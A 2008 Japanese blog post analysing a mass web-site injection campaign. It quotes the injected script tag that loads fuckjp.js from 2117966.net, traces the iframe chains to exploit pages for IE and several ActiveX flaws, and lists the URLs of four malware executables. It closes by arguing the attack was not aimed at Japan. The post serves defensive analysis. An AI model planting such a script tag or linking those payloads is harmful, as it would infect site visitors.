ハルコタン紀行

2117966.netその1

FC2ブログとはあまり関係ありませんが、とりあえず。
JPCERT/CC2008年3月14日注意喚起

世界中のサイトで大規模に以下のscriptが仕込まれています
("2117966.net"で検索してみましょう)。
<script src="http://www.2117966.net/fuckjp.js"></script>
トレンドマイクロに仕掛けられていたのもこれです。
このスクリプトはいくつかのiframeが入れ替わります
(自動で、あるいは犯人の気まぐれで)。

iframeその1
http://www.2117966.net/fuckjp.js
→http://www.2117966.net/q.htm

iframeその2
http://www.2117966.net/fuckjp.js
→http://www.2117966.net/cuteqq.htm

iframeその3
http://www.2117966.net/fuckjp.js
→http://count.lljy.org/b/

また、iframeその3にはさらにiframeがあります。
iframeその4
http://count.lljy.org/b/
→http://biej8fanwo.a141.71one.com/wow/guowai.htm

iframeその1
http://www.2117966.net/q.htm
→http://www.2117966.net/Ajax.gif
→http://www.2117966.net/Ms06014.htm
→http://www.2117966.net/Ms06067.gif
→http://www.2117966.net/Ms07004.htm
→http://www.2117966.net/Pps.gif
→http://www.2117966.net/Real.gif

iframeその2
http://www.2117966.net/cuteqq.htm
→http://www.2117966.net/Ajax.gif
→http://www.2117966.net/Bfyy.gif
→http://www.2117966.net/Lz.gif
→http://www.2117966.net/Ms06014.htm
→http://www.2117966.net/QVod.htm
→http://www.2117966.net/Real.gif
→http://www.2117966.net/XunLei.gif

iframeその3
http://count.lljy.org/b/
→http://count.lljy.org/b/Ajax.gif
→http://count.lljy.org/b/Ms06014.htm
→http://count.lljy.org/b/Ms06067.js
→http://count.lljy.org/b/Ms07004.html
→http://count.lljy.org/b/Real.js
→http://count.lljy.org/b/Yahoo.Php

iframeその4
http://biej8fanwo.a141.71one.com/wow/guowai.htm
→http://biej8fanwo.a141.71one.com/wow/Ajax.gif
→http://biej8fanwo.a141.71one.com/wow/Ms06014.htm
→http://biej8fanwo.a141.71one.com/wow/Ms06067.gif
→http://biej8fanwo.a141.71one.com/wow/Ms07004.htm
→http://biej8fanwo.a141.71one.com/wow/Real.gif
→http://biej8fanwo.a141.71one.com/wow/Yahoo.php

最終的にアンチウイルスが検出・駆除すべきウイルスは以下の4匹です。
http://www.2117966.net/1.exe
http://www.2117966.net/xp.exe
http://count.lljy.org/b/a.exe
http://biej8fanwo.a141.71one.com/wow/wow.exe

わかりやすいファイル名になっていますが、念のためそれぞれを見てみましょう。
ms06014 MS06-014、MDACです。
ms06067 MS06-057の間違いです。MS06-057、WebViewFolderIcon(WEBVW.DLL)です。
ms07004 MS07-004、VML(VGX.DLL)です。
ajax MS06-014、MDACです。
bfyy 暴風(BaoFeng)です(中国)。
lz HanGameCn(韓国ハンゲームの中国向けコントロール)です(中国)。
pps PPStreamです(中国)。
qvod QvodPlayerです(中国)。
real RealPlayerです。
xunlei 迅雷(Xunlei)です(中国)。
yahoo Yahoo!MessengerというかYahoo!MusicJukeboxです。

以上10個の脆弱性は全てActiveXコントロールを使うためIEでしか動作しません。
10個のActiveXコントロールのうちMicrosoft製は3個です(これらの脆弱性は全てWindowsUpdateで阻止できます)。
残り7個のサードパーティ製のうち世界で通用するのはわずかに2個(RealとYahoo!)で、
残り5個は中国内でしか使われていません(これらの脆弱性の阻止については各アプリケーションの製造元に(略))。
ターゲットは中国内外を問わず無差別であることがわかります。

冒頭で書いたとおり世界中のサイトで大規模に仕込まれています。
日本をターゲットとするのならジャストシステムなどのアプリケーションを狙うでしょうし、
海外のいかなる記事も特に日本をターゲットとするような記述はありません。

何が言いたいのかというとですね。

「fuckjp」というファイル名を根拠に「日本をターゲット」と書いたんですか?
LAC2008年3月12日注意喚起

テーマ:セキュリティ - ジャンル:コンピュータ

  1. 2008/03/27(木) 22:28:21|
  2. ウイルス
  3. | トラックバック:0
  4. | コメント:0
<<「伝える言葉」 | ホーム | fccja.comその3>>

コメント

コメントの投稿


管理者にだけ表示を許可する

トラックバック

トラックバック URL
http://ilion.blog47.fc2.com/tb.php/15-1e804a0c
この記事にトラックバックする(FC2ブログユーザー)